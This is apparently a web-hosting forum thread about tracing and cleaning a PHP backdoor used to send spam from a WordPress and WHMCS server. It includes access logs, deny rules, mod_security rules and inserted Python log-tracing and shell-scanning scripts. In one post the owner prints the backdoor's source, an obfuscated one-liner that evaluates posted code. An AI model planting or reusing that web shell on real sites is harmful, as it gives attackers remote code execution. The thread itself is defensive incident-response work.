PHP injection

Hi, I have one cPanel server with NginX + Apache where there are some WordPress sites, but there's one that has a lot of injections in it.

Web users are able to create a PHP file and then, with POST, inject thousands of emails using a local account.

I've added some extra security and tried it all, but I can't get it.

Any tips about this?

Thanks.


Comments

  • pro tip: don't use wordpress.

    Thanked by 1KeyJey
  • jarjar Patron Provider, Top Host, Veteran

    Track the POST requests in the logs to find out what plugin/theme file they are exploiting and kill it.

    Thanked by 1netomx
  • TrafficTraffic Member
    edited April 2015

    copy content, remove cPanel account (yes, REMOVE), recreate the site making sure nothing you add (like themes) has a backdoor, done

  • A little more information, these are the logs where the injection is done:

    137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    This is inside a WHMCS, but it's the latest version and auto-updated. Here is when the user could write the PHP file.

    137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    Verification that the file is there...

    And then a lot of POST entries with one nice email per post:

    202.124.242.10 - - [27/Apr/2015:11:01:57 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 1881 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:07 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:24 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:37 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 849 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:56 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2037 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:03:08 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

  • jarjar Patron Provider, Top Host, Veteran
    edited April 2015

    Those are likely POST requests to files that were changed or added by the malicious visitor/bot. Track them back in the logs, using IPs, file names, and "POST" to grep things out until you find where it began and what the initial file was. However, keep in mind that logins may be relevant as well as they will also brute force, edit a theme file, and then execute it.

    It may help you narrow down the time frame by looking at the modify time on the files, just run "stat [filename]" to grab modify times. Keep in mind that it may be a game of this file made that file which made that file, so you may need to go a ways back.

    Thanked by 1Traffic
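    As an added example (not from anyone in this thread), a Python script that does the log walk jar describes: parse combined-format lines, count POSTs per PHP path, and trace the first hit on the dropped file back to the same IP's immediately preceding request. The log lines embedded in it are constructed from the excerpts KeyJey posted, with the user-agents shortened.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines, trimmed from the log excerpts posted in this thread.
SAMPLE_LOG = """\
137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0"
137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0"
202.124.242.10 - - [27/Apr/2015:11:01:57 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 1881 "-" "Mozilla/5.0"
202.124.242.10 - - [27/Apr/2015:11:02:07 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 319 "-" "Mozilla/5.0"
"""

# Apache/nginx "combined" format: ip ident user [ts] "method path proto" status size "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

def parse_log(text):
    """Parse combined-format lines into dicts, oldest first; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
            entries.append(e)
    return sorted(entries, key=lambda e: e["ts"])

def post_targets(entries):
    """Per .php path: (number of POSTs, number of distinct client IPs).
    A dropped shell shows up as a path POSTed to by many unrelated IPs."""
    posts, ips = defaultdict(int), defaultdict(set)
    for e in entries:
        if e["method"] == "POST" and e["path"].endswith(".php"):
            posts[e["path"]] += 1
            ips[e["path"]].add(e["ip"])
    return {p: (posts[p], len(ips[p])) for p in posts}

def trace_origin(entries, suspect_path, window_s=300):
    """Find the first request for suspect_path, then every earlier request from the
    same IP inside window_s seconds: the candidate step that created the file."""
    first = next((e for e in entries if e["path"] == suspect_path), None)
    if first is None:
        return None, []
    prior = [e for e in entries
             if e["ip"] == first["ip"] and e["ts"] < first["ts"]
             and (first["ts"] - e["ts"]).total_seconds() <= window_s]
    return first, prior
```

    Run it against the real access log with `parse_log(open(path).read())`; the chain it returns here is the one KeyJey later confirms by hand (title.php POST, then the first GET of system.php, one second apart from the same IP).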
  • @Jar said:
    Those are likely POST requests to files that were changed or added by the malicious visitor/bot. Track them back in the logs, using IPs, file names, and "POST" to grep things out until you find where it began and what the initial file was. However, keep in mind that logins may be relevant as well as they will also brute force, edit a theme file, and then execute it.

    It may help you narrow down the time frame by looking at the modify time on the files, just run "stat [filename]" to grab modify times. Keep in mind that it may be a game of this file made that file which made that file, so you may need to go a ways back.

    This is the correct way. But if you forget a file or forget to fix the original problem, you'll be in the same situation as you are right now. That's why I recommended that you start over again.

    Thanked by 1jar
  • @KeyJey said:
    A little more information, these are the logs where the injection is done:

    137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    This is inside a WHMCS, but it's the latest version and auto-updated. Here is when the user could write the PHP file.

    137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    Verification that the file is there...

    And then a lot of POST entries with one nice email per post:

    202.124.242.10 - - [27/Apr/2015:11:01:57 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 1881 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:07 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:24 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:37 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 849 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:02:56 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2037 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    202.124.242.10 - - [27/Apr/2015:11:03:08 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

    There is no "system.php" in the Gravity Forms plugin's languages dir.

    http://plugins.svn.wordpress.org/gravity-forms-sticky-list/tags/1.2.12/languages/

    Most probably it's the backdoor, where users are able to inject files... But you have to find out where it came from.

    Go to your log files dir and try this; see if you can figure out where it was created from:
    grep -r "system.php" .

  • u137u137 Member
    edited April 2015

    Disable PHP execution for such upload directories. Simple to configure in nginx, and a standard setup if you follow the WP hardening instructions. For instance (nginx site config):

        location ~* /(?:uploads|files)/.*\.php$ {
            deny all;
        }
    
    Thanked by 1jar
  • zh-CN

    Block China until you figure out a permanent solution.

    Thanked by 3Jonchun Quinten Pwner
  • Normally happens when people don't pay for their themes.

  • @funyuns_are_awesome said:
    Block China until you figure out a permanent solution.

    He will just get hacked from another part of the world. Or from China, through a proxy.

    Thanked by 2jar netomx
  • 4n0nx4n0nx Member

    Would also recommend to start over.

  • @Traffic said:
    He will just get hacked from another part of the world. Or from China, through a proxy.

    You're forgetting that a lot of these attacks happen on a huge scale; odds are the attacker doesn't care to spend time switching proxies just to get 1 attack back up and running...

  • @funyuns_are_awesome said:
    You're forgetting that a lot of these attacks happen on a huge scale; odds are the attacker doesn't care to spend time switching proxies just to get 1 attack back up and running...

    I didn't forget. It's just that that specific Chinese attacker is for sure not the only one who can attack this bug - or this backdoor (anyone can exploit most of them).

  • @Traffic said:
    I didn't forget. It's just that that specific Chinese attacker is for sure not the only one who can attack this bug - or this backdoor (anyone can exploit most of them).

    Right now it is the only attack. If you read my post again, it was to temporarily get this attacker off his back, to buy time to fix things.

  • @funyuns_are_awesome then it will for sure buy time, but OP cannot assume he's safe, he still has a backdoor installed :)

    Thanked by 1jar
  • jarjar Patron Provider, Top Host, Veteran
    edited April 2015

    Traffic said: but OP cannot assume he's safe, he still has a backdoor installed :)

    In all of these that I've dealt with, the attacker is only half of the battle as well. Multiple IPs per hour would come in and execute the scripts, from all types of locations. Usually whoever actually caused it, that IP wouldn't be seen again after 24 hours. Working with sometimes up to 30 or so of these events a day at the previous job, the patterns became pretty noticeable.

    Thanked by 2netomx deadbeef
  • nocomnocom Member

    start over2late

  • cassacassa Member

    @Hybrid That is because it has been added using a backdoor. https://wordpress.org/news/2015/04/wordpress-4-2-1/

    Remove the system.php file and update WordPress; you should be fine after that.

    Thanked by 1netomx
  • Hi, I think that the start of the PHP injection is there, at the creation of the file:

    137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
    137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    This is the content of file title.php:

    <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q6fc9cb'])){eval(${$s20}['q6fc9cb']);}?>

    Rechecking the logs I saw a POST like this:

    137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    After this IP created that file and sent this POST:

    137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

    Then I didn't see that IP anymore, but a lot of POSTs started to originate from multiple IPs.

    Before that "title.php" I don't know what else to check.

    Of course, when I see the attack, I immediately move the injected PHP file and keep checking logs, confirming that all is back to normal after seeing a lot of 404 errors in the Apache logs.

    @cassa yes, it was the latest version with that vulnerability issue, I just manually upgraded to 4.2.1. I really hope this is the problem.

    This has been happening about once or twice per week for the last 5 weeks; I couldn't find a definitive solution to this.

    I could see always the injection and the attack, the posts ... but never the source of the problem.

    @Jar thanks for the tips, very helpful!

    @Traffic that site is full of installs and plugins, if I can avoid that, I will. But if I still don't fix this, I'll have to do that as my latest option.

    @Linkking I would never use a patched or nulled theme / script. I know they're full of backdoors ;)

    @Hybrid I guess I found when and where it was injected, but still don't know the source of the problem.

    @u137 it's not a typical upload PHP file, I can't block access to PHPs, the entire site would stop working. Also, unfortunately, it's a cPanel VPS!

    @funyuns_are_awesome yes, the browsers' local language is Chinese, but the attack IPs (using POST) are coming from all around the world, most of them in the USA.

  • jarjar Patron Provider, Top Host, Veteran

    Is that a WHMCS install by chance, where that title.php was? Just the folder structure makes me think of that.

  • It's a WordPress site installed in root / and WHMCS installed in /panel.

    But as far as I can remember, this is aleatory, I mean that other hacks weren't located inside the /panel directory. Not sure right now, but I think so.

  • jarjar Patron Provider, Top Host, Veteran
    edited April 2015

    Hmm. Something put that there in the WHMCS folder then. I suppose that's as far back as you found grepping the logs for "title.php" though. This isn't a guarantee, but may find some encoded PHP files if any were missed:

    http://www.gregfreeman.org/2013/how-to-tell-if-your-php-site-has-been-compromised/

    (The code didn't paste well; the stuff in that article is good though, but it may also find legit files.)

    Sorry to make you work more! That uneasy feeling, it feels irresponsible not to say it ;)

    Thanked by 1KeyJey
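    An added example, not from anyone in this thread, that does statically what the article jar links to does with grep: it decodes the index-shuffle trick in the title.php one-liner KeyJey posted (the $qV[4].$qV[3]... pieces of "stop_" spell _POST, so the file is just eval($_POST['q6fc9cb'])) and walks a docroot flagging PHP files with the same traits, optionally limited by modify time. The docroot path and age window are the caller's assumptions, and as jar notes the heuristics will also hit some legitimate files.

```python
import os
import re
import time

# Constructed copy of the title.php one-liner posted in this thread; it is only parsed here, never run.
TITLE_PHP = ('<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);'
             'if(isset(${$s20}[\'q6fc9cb\'])){eval(${$s20}[\'q6fc9cb\']);}?>')

# Heuristics for code that runs attacker-supplied data or hides what it does.
SUSPICIOUS = [
    (r'\beval\s*\(', "eval() of runtime data"),
    (r'\$\{\s*\$', "variable-variable ${$x}: superglobal name hidden"),
    (r'\b(base64_decode|gzinflate|str_rot13)\s*\(', "payload decoder"),
]

def resolve_index_shuffle(src):
    """Rebuild a name assembled as $v[i].$v[j]... from a string literal $v, e.g.
    "stop_" with indices 4,3,2,0,1 -> "_post" -> strtoupper -> "_POST"."""
    lit = re.search(r'\$(\w+)\s*=\s*"([^"]*)"', src)
    if not lit:
        return None
    var, s = lit.groups()
    idx = re.findall(r'\$' + re.escape(var) + r'\[(\d+)\]', src)
    built = "".join(s[int(i)] for i in idx if int(i) < len(s))
    return built.upper() if "strtoupper(" in src else built

def scan_php_source(src):
    """Return the list of reasons a PHP source looks like a web shell (empty if clean)."""
    hits = [why for pat, why in SUSPICIOUS if re.search(pat, src)]
    name = resolve_index_shuffle(src)
    if name and name.startswith("_"):
        hits.append("superglobal assembled at runtime: $" + name)
    return hits

def scan_tree(root, max_age_days=None):
    """Walk a docroot and report (path, mtime, reasons) for flagged .php files;
    max_age_days limits the walk to recently modified files (the stat tip above)."""
    cutoff = time.time() - max_age_days * 86400 if max_age_days else None
    findings = []
    for d, _, files in os.walk(root):
        for f in files:
            p = os.path.join(d, f)
            if not f.endswith(".php") or (cutoff and os.path.getmtime(p) < cutoff):
                continue
            with open(p, errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                findings.append((p, time.ctime(os.path.getmtime(p)), hits))
    return findings
```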
  • I just sent you a PM now about this... hehehe.

    Also the link you're suggesting is compromised! My local antivirus won't allow me to access it! LOL

    http://snag.gy/IuKoS.jpg

  • Older Gravity forms plugin has issues. See https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html

    Do you use mod_sec for Apache? If not, you should.

    Add this to wp-content/uploads/.htaccess:

    <Files *.php>
    deny from all
    </Files>


    wp-content/.htaccess

    # Disable access to all file types except the following
    Order deny,allow
    Deny from all
    <Files ~ "\.(xml|eot|svg|ttf|woff|otf|ico|css|pdf|jpe?g|png|gif|js)$">
        Allow from all
    </Files>


    Deny access to the wp-config.php file. Add this to the .htaccess in the root of the web server:

    <Files wp-config.php>
    order allow,deny
    deny from all
    </Files>


    mod_sec: example of blocking links that contain _input__test.php or _input__test.php5

    SecRule REQUEST_URI|ARGS|REQUEST_BODY "_input__test.php" "t:lowercase,deny,status:403,log,id:6505,msg:'_input__test.php query string'"
    SecRule REQUEST_URI|ARGS|REQUEST_BODY "_input__test.php5" "t:lowercase,deny,status:403,log,id:6506,msg:'_input__test.php5 query string'"
    

    mod_sec: blocking wp-config.php on links

    SecRule ARGS_GET "wp-config.php" "t:lowercase,deny,status:403,log,id:6507,msg:'wp-config query string'"
    
    Thanked by 1KeyJey
  • @hdpixel, thanks for this useful information, I already updated the .htaccess files in every directory.

    My frontend is NginX, so I don't think mod_sec would work.

    Cheers !

  • Try installing Wordfence in WordPress.

    Thanked by 1KeyJey
  • Wordfence has been there since the beginning ;)

  • Sometimes I see this in the log:

    109.236.88.29 - - [28/Apr/2015:09:12:38 -0300] "GET / HTTP/1.0" 200 60960 "-" "ANTIPIDERSIA"

    Sounds like "The bad guy" taking a look ;)

  • @KeyJey said:
    Wordfence has been there since the beginning ;)

    With Wordfence, find out which files changed.

    Thanked by 1KeyJey